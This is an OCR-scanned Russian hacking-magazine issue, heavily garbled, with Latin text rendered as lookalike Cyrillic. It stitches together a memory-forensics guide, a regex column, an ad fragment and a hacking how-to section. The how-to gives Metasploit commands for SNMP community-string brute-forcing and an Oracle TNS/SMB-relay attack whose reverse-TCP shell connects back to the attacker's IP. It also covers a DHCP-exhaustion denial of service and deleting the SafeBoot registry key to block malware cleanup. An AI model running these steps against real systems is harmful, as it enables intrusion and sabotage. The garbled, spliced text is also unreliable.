сграбленный дамп памяти. К счастью, утилита из короб- 
ки является рогІаЫе, и установить ее можно прямо из 
командной строки: шзіехес /а Метогу 2 еЗеСир . 
тві /фо ТАКСЕТБІК=путь_до_флешки_и_папки_ 
на_ней . 

Не лишним будет записать на флешку и файлы Аибіі 
Ѵіеѵѵег’а, чтобы сразу иметь возможность проанали- 
зировать полученный дамп или вообще выполнить 
«живое» исследование системы. 

Создаем образ памяти 

Теперь, когда все приготовления завершены, попро- 
буем программу в деле. Как я уже говорил, Метогуге 
работает из командной строки. Но для большего 
удобства с программой поставляют несколько Ьаісб- 
скриптов для выполнения наиболее типичных задач. 
Так, для получения образа с полным содержанием опе- 
ративной памяти есть сценарий МетогуОО.ЬаІ, его-то 
мы и будем использовать. После запуска он генерирует 
конфиг с настройками и выполняет тетогуге.ехе с нуж- 
ными параметрами: «6:\\\\тетогуге\\\\Метогу00.ЬаІ». 
После выполнения команды есть два варианта: про- 




НТТР://ѴѴѴШ 
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Вообще говоря, 
анализировать дамп 
памяти можно и 
без использования 
АисІ И; Ѵіеѵѵег’а. Для 
получения наиболее 
востребованных 
данных с Метогуге 
идут специальные 
ЬаісЬ-сценарии. 

Так, чтобы получить 
список всех про- 
цессов из системы, 
достаточно запустить 
Ргосезз.ЬаТ Вывод 
при желании можно 
детализировать, 
запустив тот же сце- 
нарий с нужными 
ключами. Например, 
«Ргосезз.ЬаІ: -роНз 
Ітие» помимо непо- 
средственно списка 
процессов указывает 
еще и на открытые 
ими порты. Но, 
как ни крути, 6111- 
оболочка для изуче- 
ния образа памяти в 
использовании куда 
приятнее. 
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Как это может помочь 
при Веѵегее Епдіпеегіпд? 



С помощью Метогуге можно получить образ конкретного про- 
цесса или драйвера со всеми его бинарными секциями из физи- 
ческой памяти. Причем можно извлечь его как с «живой» систе- 
мы, так и из ранее созданного дампа оперативной памяти. На 
деле это позволяет, к примеру, обойти антиотладочные техники, 
которые часто реализованы в малвари, после чего процесс или 
драйвер можно анализировать в любимом дизассемблере. 

В программе заготовлены несколько специально заточенных для 
этого аспекта сценариев. 

Создание образа процесса: 

• РгосеззВБ.ЬаС -ріскРів> — получение образа процесса 
из запущенной системы; 

• РгосеззВВ . ЬаС -рісі <РІВ> -іприС<Рі1епаше> — 
извлечение образа из имеющегося дампа с памятью системы. 

С извлечением драйвера и сохранения в файл все аналогично: 

• ВгіѵегВВ . ЬаС -(Ігіѵег<с1гіѵегпате>; 

• ВгіѵегВВ . ЬаС -(ігіѵег«ігіѵегпагпе> -іприС<Рпаше>. 



грамма успешно создаст дамп с памятью или у нее ничего не 
выйдет. Последнее очень вероятно. Дело в том, что для работы 
Меппогуге использует кегпеі-тосіе драйвер, предоставляющий 
программе прямой доступ к памяти. Нет драйвера - нет дампа. 
Есть несколько причин, по которым драйвер не сможет загрузить- 
ся, но в первую очередь — из-за отсутствия прав администратора. 
Поэтому убедись, что запускаешь ее из рутовой командной строки. 
Другая распространенная причина — антивирус, который может 
препятствовать прямому обращению к памяти. Возможно, что на 
время его придется отключить. Если все пройдет успешно, полу- 
ченный дамп будет сохранен в папке с выходными результатами 
(по умолчанию в папке с Меппогуге/Аисіііз). Структура каталога 
устроена таким образом, чтобы повторные выполнения процеду- 
ры не перезаписывали ранее полученные образы. Так что всегда 
легко определить, на каком компьютере и когда был создан образ. 

Анализируем дамп 

Для анализа и просмотра образа памяти, как я уже сказал, 
используется другая утилита — Аибіі Ѵіеѵѵег. Причем содержание 
оперативной памяти необязательно должно быть сдамплено с 
помощью Метогуге. Гораздо большее значение имеет опера- 
ционная система, на которой создавался образ. Причиной тому 
являются структуры памяти, которые могут значительно отличать- 
ся от одной версии операционной системы к другой. В некоторых 
случаях даже один установленный (или, наоборот, неустановлен- 
ный) патч может влиять на возможность выполнить анализ дан- 
ных. Анализатор может парсить только структуры известной ему 
ОС. Поэтому, прежде чем говорить, что Метогуге и Аибіі Ѵіеѵѵег 
не работают, необходимо убедиться, что ты не пытаешься выпол- 
нить анализ неподдерживаемой системы (например, ѴѴіпсіоѵѵб ХР 
5Р1). К счастью, для внушительного списка ОС все должно без 
проблем получиться: 

• ѴѴіпсіоѵѵб 2000 Бегѵісе Раск 4 [32-ЬіД; 

• ѴѴіпсіоѵѵб ХР Бегѵісе Раск 2 апб Бегѵісе Раск 3 (32- ЬМ;) ; 

• ѴѴіпсіоѵѵб Ѵібіэ Бегѵісе Раск 1 апб Бегѵісе Раск 2 (32-Ьіі); 

• ѴѴіпсіоѵѵб 2003 Бегѵісе Раск 2 (32-Ьіі); 

• ѴѴіпсіоѵѵб 2003 Бегѵісе Раск 2 (64-Ьіі); 

• ѴѴіпсіоѵѵб 7 Бегѵісе Раск 0 (32-ЬіД; 

• ѴѴіпсіоѵѵб 7 Бегѵісе Раск 0 (64-Ьіі); 

• *ѴѴіпсІоѵѵ5 2008 Бегѵісе Раск 1 апб Бегѵісе Раск 2 (32- ЬМ;) ; 

• *ѴѴіпсІоѵѵ5 2008 Р2 Бегѵісе Раск 0 (64-Ьіі). 

Звездочкой в этом списке обозначены те системы, поддержка 
которых находится в бета-тестировании. Для анализа дампа 
достаточно запустить аибііѵіеѵѵег.ехе и выбрать пункт «СопРдиге 
Метогуге». Не обращай внимания на опцию «Ореп Ехізііпд 
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Доступны различные алгоритмы для поиска драйверов 




Настройки для анализатора процессов 



РезиНз» — она предназначена для повторного открытия 
уже существующего файла с анализом дампа. Для выполне- 
ния исследования программа попросит тебя указать путь до 
исполняемого файла Метогуге и выбрать папку для сохране- 
ния результатов. Далее есть два варианта: выполнить анализ 
имеющегося дампа памяти (возможно, с совершенно другого 
компьютера) или проанализировать память с текущего компью- 
тера. Выбираем первый режим и указываем путь до ітд-файла 
с нашим образом. 

Несколько следующих шагов мастера необходимы для того, чтобы 
указать, что именно нас интересует и насколько полную инфор- 
мацию мы хотим получить. Скажем, если тебя интересуют только 
драйверы, которые работают в системе, можно не парсить инфор- 
мацию о хуках и процессах. Подход «поставить все галки» здесь 
не пройдет. Важно понять простую вещь: чем детальнее анализ 
будет выполнять АисІИ: Ѵіеѵѵег, тем дольше она будет это делать. 

В некоторых случаях процесс может затянуться на целый день. 

Но таких пыток легко можно избежать, минимизируя количество 
проверок, которые будет выполнять программа. Например, вклю- 
ченная опция для извлечения строковых переменных («Ехігасі 
зігіпдз») непременно приведет к многочасовому анализу. Поэтому 
этот вид исследования рекомендуется оставить на повторный 
проход (если такой понадобится), выполнив в первый раз толь- 
ко те проверки, которые тебе действительно нужны. Хорошие 
результаты при высокой скорости сканирования могут дать сле- 
дующие настройки сканирования: режим исследования процессов 
(«РгосезБ Епитігабоп») без определения хуков и драйверов, но 
с большинством включенных опций за исключением уже упо- 
мянутой «Ехігасі Бігіпдз». Отдельно идут опции для извлечения 
(Асдиізіііоп) из памяти или образа памяти адресного пространства 
драйверов или процессов. В основном это нужно, если ты имеешь 
конкретные намерения исследовать что-то из извлеченных дампов 
в дизассемблере. 

Как только все настройки анализа будут заданы, АисІИ; Ѵіеѵѵег 
начнет работу, отобразив на экране прогресс-бар. В окне програм- 
мы прямо во время парсинга дампа памяти будут отображаться 
результаты анализа, включая информацию о процессах, драйве- 
рах, хуках (в зависимости от выбранных настроек). Тут придется 
подождать, но зато отчет тебя непременно впечатлит. Чего стоит 
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ВАТ-файлы, включенные в состав Метогуге 
для решения наиболее востребованных задач 

только список идентифицированных процессов со спи- 
ском всех связанных ОН, хэндлов, секций памяти и 
так далее. Еще раз обращаю твое внимание: это будет 
список абсолютно всех процессов, включая те, кото- 
рые, возможно, спрятаны в системе руткитами. Та же 
история и с драйверами. 

И не могу не рассказать об одном интересном трюке. 
Если дважды кликнуть по названию процесса, в пра- 
вой части программы появятся несколько новых вкла- 
док. В некоторых из них есть колонка «Оссиггепсез» 
с цифровыми значениями (например, для списка 
прилинкованных к процессу сИІ-библиотек). Эта фича 
основана на параметре Ееазі Егециепсу о! Оссиггепсез 
(ЬЕО), описанном Питером Сильбермэном. Идея очень 
простая, но очень эффективная: тела малвари обычно 
относительно уникальны. Поэтому если компонент 
используется в нескольких процессах, то ему, вероятно, 
можно доверять. А если же нет, есть повод насторо- 
житься. Такой простой принцип зачастую помогает 
быстро определить вредоносные библиотеки. 

Выполнение «живого» 
анализа памяти 

Теперь рассмотрим случай, когда мы можем проанали- 
зировать память на имеющемся в распоряжении ком- 
пьютере. В этом случае необязательно создавать дамп 
— у Аисііі Ѵіеѵѵег есть Ііѵе-режим, который имеет ряд 
преимуществ. Самая главная фишка в том, что помимо 
непосредственно оперативной памяти ты можешь под- 
ключить для анализа еще и зѵѵар-файл, а также выпол- 
нять проверку цифровых подписей. Это информация 
используется для подсчета индекса МРІ (Метогуге’з 
Маіѵѵаге Рабпд), позволяющего поразительно быстро 
определить широкий круг малвари. Если программе 
какой-то компонент покажется подозрительным, ты 
сразу об этом узнаешь. Имей в виду, что при соответ- 
ствующей включенной опции утилита будет вычислять 
хэш для каждого исполняемого файла и библиоте- 
ки, ассоциированных с запущенными процессами. 

Это может занять значительное время. Поэтому как 
минимум не надо выбирать подсчет всех хэшей сразу 
(поддерживаются Мйб, 5НА1, 8НА256). Можно ограни- 
читься одним из них, который ты действительно будешь 
использовать: например, Мйб. Выполнение «живо- 
го» анализа мало чем отличается от парсинга дампа 
памяти. В том месте, где мы раньше указывали путь до 
іппд-файла, достаточно выбрать режим «Асциіге (апб/ 
ог) Апаіуге Ыѵе Метогу». И все. Тут стоит сказать, что 
выполнение «живого» анализа никак не мешает нам 
сделать дамп памяти. Никогда заведомо не знаешь, 
что позже ты можешь в нем обнаружить и увидеть. Для 
этого в момент выбора режимов извлечения (там же, 
откуда ранее могли извлечь дамп конкретного процесса 
или драйвера) надо не забыть выбрать опцию «Метогу 
Асдиізіііоп». 



А вот и список найденных в системе драйверов 







Список процессов с различными параметрами 

Почему Метогуге? 

Связка Метогуге и Аисііі Ѵіеѵѵег не единственная 
для проведения Метогу Еогепзіс. Широко распро- 
странен также открытый проект Ѵоіаіііііу Ргатеѵѵогк 
( ѵоіаіііезѵзіетз.сот ). При наличии МіпібѴѴ и интерпре- 
татора Руібоп его даже можно запустить под ѴѴіпбоѵѵз, 
но для этого придется повозиться. Намного проще 
совладать с ним под Ыпих (особенно если иметь под 
рукой мануал ЬІЕІѵ/ѴоІаІІІІІѵМапиаІ ]. В специальном 
дистрибутиве для компьютерных криминалистов 5АМ5 
Іпѵезіідаііѵе Еогепзіс Тооікіі фреймворк включен и 
сразу готов к работе. Сборка этой системы выложена 
в виде образа для запуска под ѴМѵѵаге ( сотриіег- 
Ьгеп5Ісз.5ап5.огд/соттипіІу/сІоѵѵп[оасІ5 І и доступна 
для бесплатной загрузки. 

И все-таки чувствуешь, что все как-то сложнее? По 
этой причине я и выбрал для себя Метогуге. При 
всем богатстве функционала он не похож на серьезный 
продукт для компьютерных криминалистов. Работать 
с ним можно сразу: для этого не надо вникать в горы 
мануалов, чтобы получить результат. Записал файлы 
на флешку, создал образ памяти в файл и проанали- 
зировал его с помощью Аисііі Ѵіеѵѵег — все просто, как 
дважды два. Не надо быть специалистом, чтобы рас- 
познать в полученных результатах элементы зловреда. 
Используемые в программе метрики (Оссиггепсез и 
МРІ) вкупе с проверкой цифровых подписей часто явно 
дают понять, какие из найденных компонентов вызыва- 
ют подозрения. 

Вообще, сама тема Метогу Еогепзіс вызывает большой 
интерес, причем не только как отдельный вид крими- 
налистических расследований, но и как эффективный 
способ для анализа системы (часто незаметного). Это, 
к тому же, еще и работающий метод для излечения и 
реверсинга с целевого компьютера отдельных процес- 
сов и драйверов, ц-ц 



> сіѵсі 

На дискеты найдешь 
все необходимое для 
проведения анализа 
дампа памяти. 
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Колонка редактора 

Про регулярные выражения 



Регулярные выражения — что это? Все о 
них слышали, но почти никто, кроме раз- 
работчиков, не использует. А между тем, это 
мощнейшее средство для поиска и осущест- 
вления манипуляций в тексте. Любая «регу- 
лярка» (или «регесп») представляет собой 
шаблон-образец для поиска, составленный 
по особым правилам. По какой-то нелепой 
и непонятной мне причине многие думают, 
что регулярные выражения, во-первых, 
очень сложны, а во-вторых, нужны только 
программистам. И то и другое — чушь. 

С непривычки действительно довольно 
сложно въехать в принцип составления 
регулярок. Нужно думать, привыкать к син- 
таксису, подсматривать в шпаргалки с мета- 
символами и внимательно изучать примеры. 
К счастью, сейчас есть целый набор инстру- 
ментов, которые кардинальным образом 
упрощают как изучение регулярных выра- 
жений, так и их дальнейшее использование. 
Тем более, широко доступны базы готовых 
регулярок для решения наиболее типичных 
задач, так что во многих случаях можно 
вообще ничего не составлять вручную и при 
этом использовать очевидные преимуще- 
ства технологии. 

Также довольно глупо полагать, что регуляр- 
ными выражениями могут воспользоваться 
только лишь программисты. Если вспомнить 
историю, то впервые поддержка регеспов 
появилась вовсе не в языках программиро- 
вания, а в юниксовых программах: редак- 
торе зесі и фильтре дгер. Сейчас же все 
большее количество приложений начинает 
поддерживать регулярные выражения для 
эффективного выполнения самых обычных 
задач: файловые менеджеры, текстовые 
редакторы и многие другие. 

Можно по-прежнему использовать стан- 
дартный поиск с заменой для внесения 
правки в тексте, а можно приспособить 
регулярки для автоматического выполнения 
самых сложных замен. И это лишь прими- 
тивный пример. 

В рамках этой колонки я ни в коем случае не 
хочу рассказывать о том, как составляются 
регулярки. Базовые знания, которых впол- 
не достаточно для старта, можно получить, 
просто прочитав соответствующую статью 
в русской ѴѴікіресІіа. Зато я точно знаю, как 
сделать процесс освоения, тестирования 
и использования регулярок проще, чем и 
спешу поделиться. 

Чтобы лучше осознать, что регулярное 



выражение, как бы сложно оно ни выгляде- 
ло, представляет собой лишь шаблон для 
поиска, нужно представить его в понят- 
ном графическом виде. Сервис зІгТгіепс! 
ЫНпепб.сот ) позволяет для любой регу- 
лярки получить визуальное представление 
того, как она будет обрабатываться. Это 
сразу добавляет десять очков к пониманию. 
Просто попробуй вставить несколько реге- 
спов из учебника или откуда-либо еще и 
посмотреть граф их обработки — все тут же 
станет намного яснее. Регулярное выраже- 
ние для проверки правильности е-таіі — 
л ([ л га\5]+)0((?:[-а-2О-9]+\.)+[а-2]{2,})$ — может 
показаться чудовищным для новичка. Но 
все встает на свои места, когда видишь его 
графическое представление (см. скриншот). 
К тому же, это еще и отличное средство для 
того, чтобы быстрее разобраться в чужом 
(или своем, но давно составленном) регу- 
лярном выражении, что полезно даже тем, 
кто с регулярками проблем не испытывает. 
Аналогичный функционал предлагает раз- 
работка бгарИгех ( сгоіопгезеагсб.сот/ 
дгарбгех ). реализованная в виде плагина 
для среды разработки Есіірзе. 

Если ввести это же регулярное выражение 
в программе РедехВисісіу ( ~едехЬис!с1у.сопп ). 
то получишь не менее ценную помощь. Для 
каждого токена (значимого элемента) регу- 
лярного выражения программа выдаст рас- 
шифровку: зачем он нужен и что в данном 
случае делает. Но главное то, что возможна 
и обратная конвертация. Как это выглядит? 
Через удобное меню ты выбираешь нужные 
тебе токены с понятным описанием — ска- 
жем, «позиция в начале строки», «после- 
довательность из не менее 2-х и не более 



4-х символов», «символы от А до 2 и цифры 
от 0 до 9», — а РедехВисісіу сам составляет 
регулярное выражение: «\А[А-20-9]{2,4}». 
Синтаксис сильно отличается в разных 
языках программирования, но программа 
поддерживает почти все вариации (Регі, 

С#, РНР, Руібоп, Чаѵа, ЧаѵаБсгірі: и другие). 
Полученную регулярку тут же можно про- 
тестировать на произвольном тексте или 
сохранить для будущего использования в 
базе данных, в которой изначально собрано 
множество готовых примеров. 

Аналогичные возможности предостав- 
ляют и другие утилиты, в том числе 
Ехргеззо ( иіігарісо.сопгі ) и ТЬе гедиіаіог 
( зоигсеіогде.пеі/ргоіесіз/гедиіаіог ). В отли- 
чие от РедехВисісіу они бесплатны, но и не 
настолько удобны. 

Напоследок хочу рассказать еще об одном 
любопытном методе, позволяющем каждому 
составлять регулярные выражения и при 
этом вообще не вникать в их синтаксис. 

Идея в том, чтобы предоставить програм- 
ме текст и отметить в нем те фрагменты, 
которые должна находить регулярка. 
Приложение при этом само пытается выпол- 
нить сопоставление и составить примерное 
регулярное выражение. Такой подход реа- 
лизован в утилите ВедехМадіс ( гедехтадіс. 
сот ). Она, конечно, не сможет сделать абсо- 
лютно все за тебя — различные параметры 
регеспа непременно придется уточнять и 
подстраивать, но процесс работы выстроен 
таким образом, что работать с синтаксисом 
регулярных выражений не нужно вовсе. 
Несколько демонстраций с практически- 
ми примерами на официальном сайте — 
наглядное тому подтверждение, ш 



Графическое представление регулярного выражения 
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■ - Система кошерного питания • это древнейшая. бережно сохраняемая 



■ | традиция еврейского народа, в ее основе лежат несколько заповедей 
.ѵ из Торы в том числе, относящиеся к здоровью животных. . ; 

1 Ученые изучали и применяли Законы каі ирута на протяжении трех тысяч лет 



Люди различных национальностей и вероисповеданий доверяют 
качеству кошерных продуктов. Во многих странах мира, кошерные ■ 
продукты питания считаются более качественными - из -за строгого 
контроля и дополни юльных требований по гигиене, нишевым добавкам 

и применению химически хетест. ' 

Идеологическую основу кошерного питания прекрасно передает 
поговорка "мм - эю ю. что мы едим". От еды напрямую зависит 
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■ ■ Алексей « 6 геепйод» Тюрин (адггггіодгадтаіі.сот) 




МеГазрІоіі. 
подмена МАС, 
взлом Огасіе, 
2ептар 




ЗАДАЧА: Создать 6111-интерфейс под 
Меіазріой Ргатеѵѵогк. 



РЕШЕНИЕ: 

Прошедшим летом МЭРобзавелся новым 0111-интерфейсом, написан- 
ным на Заѵа. Это было хорошей заменой старому, кривоватому. Об этом 
я писал в одном из прошлых номеров, Заѵа-гуй вырос. И теперь пред- 
ставляет собой хороший продукт. Хотя, спартанский такой получился 
— консоль незаменит. Удобно в нем разве что полазить по папочкам 
жертвы или порыскать по структуре модулей/сплойтов, которых стано- 
вится все больше. Юзабилити у него не на самом высоком уровне. 

Но некоторое время назаду нового гуя появился конкурент. Причем от 
стороннего фаната-разработчика, который трудится не покладая рук. 
Гуи получился хорошенький, няшныйтакой :). И народу это творение 
понравилось. Название ему (точнее, ей) - Агтііаде. Фанатика-созда- 
теля зовут Рафаэль Мудж. Сайт — (азІапсІеазуЬаскіпд.сопп . 

Агтііаде, аналогично официальному ОШ, написана на Заѵа и ис- 
пользует РРС для взаимодействия с МЭР (хотя и используется РРС, 
но обертке требуются кое-какие части самого МЭР, потому удаленное 
использование Агтііаде пока невозможно). Для работы новой ОШ тре- 
буется Эаѵа версии не ниже 1 .6, а также база данных (РозІдгеЗОБ или 
МуЭОЦ к которой подключен МЭР. Агппііаде получилась и юзабельна, 
и очень наглядно-показательна. С такой штукой круто скриншоты 
делать. Тру-хакерские получаются :). Видно, что Рафаэль подошел к 
делу с любовью. Сам автор позиционирует свое творение как вещицу 
для тех, кто не юзаетМЭР каждый день, но хотел бы без проблем вос- 
пользоваться всеми благами фрэймворка. Но лучше один разувидеть, 
чем сто раз прочитать — для этой штуковины ужточно. А потому сразу 
отправляю на просмотр пары показательных видео: 
[а5Іапбеа5ѵбаскіпд.сот/тес1іа . Кроме красот и хорошей юзабельности 
есть еще небольшие полезные фичи и бонусы, которые в совокупности 
делают Агтііаде ужточно круче официального ОШ. Например: 

• красивое название и стильная иконка : ) ; 

• визуализация хостов поверженной сети, направления атаки; 

• рекомендации по использованию сплойтов /развитию атаки; 

• понятное и постоянное взаимодействие с базой данных. 

Из косяков сразу стоит отметить некорректную работу с русскими коди- 
ровками и пока что отсутствующий модуль Іпсодпііо. 

Установка и запуск Агтііаде 

Так как проект небольшой, то в нем нет поддержки старых версий МЭР (а 
оно кому-то надо?). Потому желательно иметь наиболее свежую версию 
МЭР (тзфрсіаіе). Итак, установка подѴѴіп. 

1. Разархивируем архив в папкус МЭР. 

Если точнее, то агтіІаде.ЬаІ;- в корень, иконку — в ісопз; агтііаде- в 
тзРЗ, папкуагтііаде — в папку баіа. 

2 . Запускаем тзітрссі. 

Либо в тзЮопзоІе пишем Іоабхті, из которого получаем логин и пароль, 




Пять хостов в локалке, один - уже наш 

либо запускаем в консоли (стандартной виндовой или от МЭР) команду: 

гиЬу шзбгрсб -Р раззтлгогсі -б 

Здесь-Р — парольна вход (логин тзб, Ш -демон в бэкграунд (не 
работает в ѴѴіп). 

3. АгтіІаде запускаем, используя агтТаде.ЬаТ Вводим логин, парольи 
другие настройки для подключения ктзітрссі, строка для подсоедине- 
ния к БД подгрузится автоматически. Если последнее не произошло, 
то можно сделать это ручками - настройки БД МЭР' а лежат в %МЗР%\ 
сопРдѴіаІаЬазе.уппІ. 

4 . Кликаем Соппесі и наслаждаемся прекрасным :). 

Установка под *піх.2. 

1. Установить Агппііаде проще всего, используя арі-деі: 
арб-деб іпзбаіі агтібаде 

2 . Второй пунктаналогичен ѴѴіп-версии (разве что гибу можноубрать). 

3. Данные по БД требуется указывать вручную. В ВаскТгаск4 Р2 ис- 
пользуется МуЭОБ: 

Запускаем МуЗОЬ:ы 

/ебс/іпіб . б/тузді збагб 

Запускаем Агтібаде: 

. /агтібаде . зй 

Логин\пароль в настройках коннекта к БД - гооіДоог. 

Последние новости: Агппііадетеперьустанавливается автоматически 
по команде тзфрсіаіе. 
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ЗАДАЧА: Подменить ЛЛАС-адрес сете- 
вой карты. 



РЕШЕНИЕ: 

Да-да-да, задача простая. Но это ни в коем случае неумаляетее 
значимости. Напомню, МАС-адрес- это уникальный 48-битный иден- 
тификатор, присваиваемый каждой единице оборудования в сети. 
Помни, что МАО не выходитза пределы локалки и обрубается при вы- 
ходе пакета из другого сегмента сети. А потому потребность в смене 
МАС’а связана в основном с «работой» в локальных сетях. Например, 
когда заблочатна каком-то сетевом оборудовании за неправомер- 
ные действия типа сканирования. Фильтрация по МАС'у- одно из 
основных действий. Все сетевухи позволяют изменять МАС-адрес, но 
настройки чаще всего запихнуты куда-то глубоко, и вносить измене- 
ния в производственных масштабах неудобно. 

Под ІІпіх существует классический тассЬапдег [ аІоЬЬз.сот/ 
тассбапдег ), Можно поменять адрес на полностью рандомный МАО, 
частично рандомный (отопределенного производителя) либо ввести 
его вручную. 

ібсопбід ебЪ 0 боѵлі 
тассЬапдег -а ебЬО 

Здесь мы получаем рандомный МАО на интерфейсе еіЬО, перед этим 
отключив его в первой строчке. 

Можно обойтись и системными средствами(Ыпих): 

ібсопбід ебШГ Іш еЫіег <тас-ас1с1гезз> 



А под ѴѴіп могу посоветовать ТМАС от наших индийских соратников 
( ІесЬпіІіит.сот ) — утилита хороша тем, что работает под все версии 
винды. Можно выбирать производителя, отключать получение ІР по 
ОНСР, атакже есть пара полезных мелочей типа автоматического 
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Наглядное изменение АЛАС-адреса 



отключения интерфейса на время смены адреса. А главное - сделано 
в Индии :). Кстати, на основе смены МАС'а существует одна ОоЗ-ата- 
ка- израсходование всех ІР-адресов подсети. Атака возможна, если 
в локалке работает выдача по ОНСР. Суть заключается в том, что мы с 
подставных МАС'ов запрашиваем новые ІР. ОНСР-сервер выдает их 
нам. Привязка МАС-ІР на сервере действует чаще всего в течение 24 
часов. Таким образом, достаточно быстро (в зависимости от размера 
подсети) мы заполучим все свободные ІР-адреса, и серверу будет 
нечего выдать ни нам, ни кому бы то ни было еще :). КМеІазрІоіІ'уесть 
модуль, реализующий эту тему — ОНСР Ехбаизііоп. Я о нем упоминал 
пару месяцев назад, когда описывал ОЫЗМіТМ. Взять можно тут: 
сііаіпіпіа.ога/теіазріоіі/сіпз сІНср.рНр 




ЗАДАЧА: Администрировать сетевое 
оборудование, используя ЗЫМР-прото- 
кол. 



РЕШЕНИЕ: 

5ММР (Зітріе ІМеІѵѵогк Мападетепі Ргоіосоі) — это протокол для 
удаленного управления всевозможными сетевыми устройствами (что, 
думаю, понятно из расшифровки аббревиатуры). 

Для своей работы 5І\ІМР использует II РР- прото кол. По стандарту сер- 
вис виситна 161 порту. Версий у ЗЫМР протокола ажцелыхтри. 

Версия 1 самая незащищенная - пароль, а точнее так называемая 
соплтипііузіхіпд, передается в открытом виде в ШР-пакете.Такчто 
можно проснифать. В версии 2 и 3 применяются хэширование и шифро- 
вание соответственно, но и они имеют криптографические проблемы. 
Хорошая практика —указывать устройству, с каких ІР могут приходить 
ЗЫМР-запросы. Но и это при определенныхусловияхлегко обходится, 
так как в II О Р отсутствует «рукопожатие» — предварительный обмен па- 
кетами для установки соединения. Сам протокол поддерживается почти 
всеми сетевымиустройствамитипа свитчей, роутеров, гейтвеев итак 
далее. Самые распространенные сопптипііу вігіпд'и - риЫіс с правами 
чтения и ргіѵаіе с правами чтения/записи настроек. 

Кстати, риЫіс не та кая уж бесполезная вещь, как может показаться. К 
примеру, по 5ІММР можноузнать точную версиюОС, список всехзапу- 



щенных процессов и открытых портов, информацию о сетевых интер- 
фейсах и прочие интересные данные. Крометого, по 5ІММР- прото колу 
можно получить полезную информацию от всевозможных штуковин 
типа обычных сетевых принтеров или чего-то более специализиро- 
ванного, например частей системы ІВМ Тіѵоіі. Атеперь — статистика. 
Во-первых, протокол версии 1 до сих пор поддерживается и очень ши- 
роко распространен. Во-вторых, чаще всего на сетевых устройствах 
5І\ІМР включен поумолчанию, причем с общеизвестными стрингами. 
И в-третьих, если поменять стандартный пароль на веб-интерфейс 
или 5зб к устройству админы не забывают, то сЗЫМР совсем другое 
дело. Да и на файрволлахтоже нечасто блочат ІЮР-трафик. 

И немного практики. Самое важное - подобрать эту самую сотппипііу- 
строчку, а потому юзаем модуль Меіазріоіі'а: 

Выбираем модуль : 

изе аихі1іагу/зсаппег/зптр/зпшр_1одіп 
Указываем цель и запускаем: 
зеб КНОЗТЗ ір_аскіг 
гип 

Подобрав строчку, можно прочитать основную информацию. Юзаем 
модульаихіІіагу/зсаппег/5птр/5птр_епит. 

И еще одна важная деталь. 5ІХІМР — это универсальный протокол 
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взлом 



для самых рзличных устройств, а потому встречаются небольшие 
трудности с его использованием, так как МІВ (иерархия настроек) 
у разныхустройств — разная, хотя и есть общие ветки (которые как 
раз и читаются модулем 5птр_епит). В метасплойте есть несколько 
модулей, заточенных под определенные задачи/устройства. Это 



скачка/закачка конфигов для Сізсо, а также раскрытие пользовате- 
лей и шар на ѴѴіпсІоѵѵз-системах. 

Для других устройств можно посмотреть их МІВ'ы и использовать спе- 
циализированный софтподЭЫМРс пеІ-зптр.зоигсеіЪгде.пеІ, который, 
кстати, предустановлен в ВТ4.. 



ЗАДАЧА: Поиск сайтов по доменному 
имени. 

РЕШЕНИЕ: 

И опятьзаймемся собирательством информации. В ситуациях, когда 
взламывается какой-то крупный портал, задача определения поддо- 
менов - важная, как ни крути. Кто знает, с какого конца пролезешь и 
откуда вылезешь? Ведь безопасность — вещь комплексная и часто 
рушится с малого... Узнаменитого портала пеІсгаИсот есть одна 
приятная возможность- поисксайтов по части доменного имени. 
Например, мы хотим найти поддомены хакер. ш. Пишем хакер- полу- 
чаем результат (см. скриншот). Конечно, есть и другие способы, но этот 
быстр и особенно хорош, если поддомены хостятся в разных местах. 
Еще положительная вещь - возможность использовать лайтовые 
регулярные выражения при запросах: 





* . хакер . ги 



любое количество символов; 

? — любой символ; 

[] - какой-то из перечисленных символов. 



Атак можноувидеть все языковые поддомены доодГа: 
тт. доодіе . * . ?? 



Например, более точный запрос на поддомены хакер. ги выглядит 
следующим образом: 



В дополнение кполученной информации мы видим примерную вер- 
сию ОС, а также владельца ІР-адреса обнаруженных серверов. 




ЗАДАЧА: Убрать возможность захода в 
безопасный режим ѴѴіпбоѵѵз. 



РЕШЕНИЕ: 

Наверное каждый, кто пользовался виндой, залезал в этот преслову- 
тый безопасный режим (8а ів Мобе) для решения каких-то проблем в 
самой ОС, либо вычищая накопившиеся кучи вирей :). Нутаквот, чтобы 
твой вирьне покоцал комп, да или просто из хулиганских целей (вспо- 
минаются ранние выпуски журнала Хакер :)), безопасный режим можно 
убить. Делается это просто -удалением следующей ветки реестра: 



НКЕУ_ЬОСАЬ_МАСНШЕ\8У8ТЕМ\СиггепкСопкго18ек\Сопкго1\ 

ЗакеВоок 



В результате при попытке запустить безопасный режим появится 
«синий экран смерти» с ошибкой о кривости реестра. Важный момент: 
чтобы вносить изменения в данную ветку, требуются права админа. 
Вместо удаления можно поступить более хитро. У ЭаІюВооІ есть под- 




Отключим клаву да мышу? 

ветки (разделы)- Міпітаіи Ые(ѵѵогк, которые определяют сервисы, 
запускаемые при старте системы в «безопасном режиме» или в 
«безопасном режиме с поддержкой сетевых интерфейсов». Таким 
образом мы можем, например, отключить мышу и клаву. Кстати, эту 
возможность можно использовать и во благо :). 




ЗАДАЧА: Захватить УА/іпсІоѵѵз с БД Огасіе 
через ТЫ5-Іі$1епег. 



Итак, поднимаем ЗМВРеІаусервак (естественно, в МеіазрІоіСе]: 

изе ехр!оік/ѵ\;іпбоѵ\;з/зтЪ/зтЬ_ге1ау 



РЕШЕНИЕ: 

В прошлом номере я писал обуязвимостяхТЫЭ-ІізІепег'а. Особенно 
при стандартных настройках в версиях Огасіе 8/9. Этот пример ис- 
пользуеттуже уязвимость (а точнее — возможность установки файла 
логов), поэтому не буду повторяться в описании. Фишка данного мето- 
да заключается в использовании зеЫод'а совместно с ЭМВРеІау'ем. 
Ну, я думаю, ты понял идею. 



Выбираем нагрузку: 

зек РАУЬОАБ міпботл;з/текегргекег/геѵегзе_кср 

Куда зтЬгеІау 'им: 

зек ЕНОЗТ ІР_жертвы 

Куда коннектится Ьаск-соппеск шеллу: 

зек ЬНОЗТ наш_ІР 
ехріоік 
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Далее запускаем регі-скрипт, который задаст Огасіе-серверу путь 
сохранения логов, а именно — наш комп с настроенным 5МВ-геІау’ем. 

. /Бпзстсі.рі -Ъ. огас1е_зегѵег_ір --гаѵгстсі 
" (БЕЗСКІРТІОБ= (СОШЕСТ_БАТА= (СІБ= ( РКОСКАМ= ) (НОЗТ=) 
